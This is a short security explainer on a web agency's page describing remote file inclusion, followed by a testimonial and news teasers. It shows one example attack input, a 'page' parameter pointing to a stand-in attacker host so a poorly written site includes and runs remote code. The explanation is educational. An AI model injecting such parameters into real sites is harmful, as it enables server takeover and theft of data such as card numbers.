Remote Code Execution is one of the scariest website / web application security risks. Here's how it works. Much like Cross-Site Scripting, the potential hacker sees a URL that looks enticing - something like:
“page.php?session=fdajkl5ejklad&page=about”
The attacker decides to try something like this:
“&page=http://www.evilhacker.com/phpHack.php”
If the underlying code for the website / web application is poorly written, it may actually try to “include” or execute the code hosted at http://www.evilhacker.com/phpHack.php. This code will probably include some sort of virus that is downloaded to the server and starts serving up illegal DVD's for download, or starts gathering information, like credit card numbers, and slowing down everything else in the process.
This type of attack is extremely dangerous because it can put the entire server at risk - not just one site.
“We have worked with Joel Post, Joe Koenig and their team at Creative Anvil since its inception and have found them to be extremely perceptive in helping us dig for our unique messaging style. They have pulled ideas from us and transformed them into an image that was just what we had in mind all along. Creative Anvil has assisted us...” Read More »
Donna Zerega
Advertising and Marketing
Prudential Alliance Realtors
St Louis, Mo
Creative Anvil is happy to welcome Dalco Home Remodeling to our growing list of clients. Creative Anvil will be developing a search engine marketing c... Read More »
Creative Anvil recently launched a new web site for Network 1 Communications. Network 1 Communications provides wireless internet service in the St. L... Read More »
Creative Anvil is excited to welcome Maryville University to our client roster. We have been contracted to work with Maryville University's Market... Read More »
I was recently setting up a new account for a new Pay-Per-Click client in Microsoft AdCenter. We've been fairly busy lately, and this is work that... Read More »
Hey folks, I wanted to let you know that new toolbar PageRank values should become visible over the next few days. I’m expecting that also in th... Read More »